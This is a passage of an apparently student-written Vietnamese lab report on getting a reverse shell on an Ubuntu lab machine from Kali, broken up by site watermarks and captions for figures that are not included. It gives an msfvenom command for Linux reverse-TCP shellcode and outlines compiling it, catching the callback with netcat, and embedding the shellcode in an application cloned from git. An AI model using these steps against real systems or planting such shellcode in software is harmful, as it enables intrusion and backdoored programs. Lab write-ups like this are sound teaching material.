1. Mục đích
Thực hiện lấy shell một máy chủ qua mạng bằng cách dùng reverse TCP và shellcode 2. Chuẩn bị và công cụ
Tên Hệ điều hành IP User
Máy attack Kali linux 192.168.36.155 Nguyet
Máy victim Ubuntu 192.168.36.166 Lab1server1
Bước 1: Tiến hành lấy shell bằng câu lệnh
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f c -- platform linux --arch x64
Thay đổi địa chỉ IP và PORT
Tiểu Luận Pro(123docz.net)
Bước 2: Chép shell vào file shell.c
Hình 43. File shell.c Bước 3: Biên dịch shell.c thành shell
Hình 44. Biên dịch shell.c Bước 4: Thực thi shell
Hình 45. Thực thi shell trên máy attack Bước 5: Mở handler bằng netcat
Hình 46. Mở handler trên máy attack
Tiểu Luận Pro(123docz.net)
Hình 47. Lấy shellcode trên máy attack Bước 7: Biên dịch getshell.c thành getshell
Hình 48. Biên dịch shellcode đã lấy ở trên Bước 8: Mở handler bằng netcat
Tiểu Luận Pro(123docz.net)
Hình 49. Chép shellcode lên máy victim Bước 10: Biên dịch và thực thi getshell
Hình 50. Biên dịch và thực thi shellcode trên máy victim
Bước 11: Quay lại máy attack , đã có kết nối từ máy victim và thực hiện chép file tcp_reverse.txt lên máy victim
Tiểu Luận Pro(123docz.net)
Hình 51. Kiểm tra kết nối và chép file lên máy victim Bước 12: Quay lại máy victim và đã có file tcp_reverse.txt
Tiểu Luận Pro(123docz.net)
Hình 52. Kết quả file chép từ attack lên victim đã có 3. Tìm hiểu cách nhúng mọt getshell vào tập tin ứng dụng bất kì và thực
thi Bước 1: Tìm source code từ git về
Hình 53. Source code một ứng dung trên git Bước 2: Chép tất cá shellcode vào file đã clone về từ git
Tiểu Luận Pro(123docz.net)
Hình 54. Chép shellcode vào ứng dụng đã clone về Bước 3: Tiến hành thực thi trên máy victim
Hình 55. Tiến hành thực thi ứng dụng đã nhúng shellcode trên máy vitcim Bước 4: Mở handler bằng netcat trên máy attack và đã có kết nối
Tiểu Luận Pro(123docz.net)
Hình 56. Mở handler trên máy attack và đã có kết nối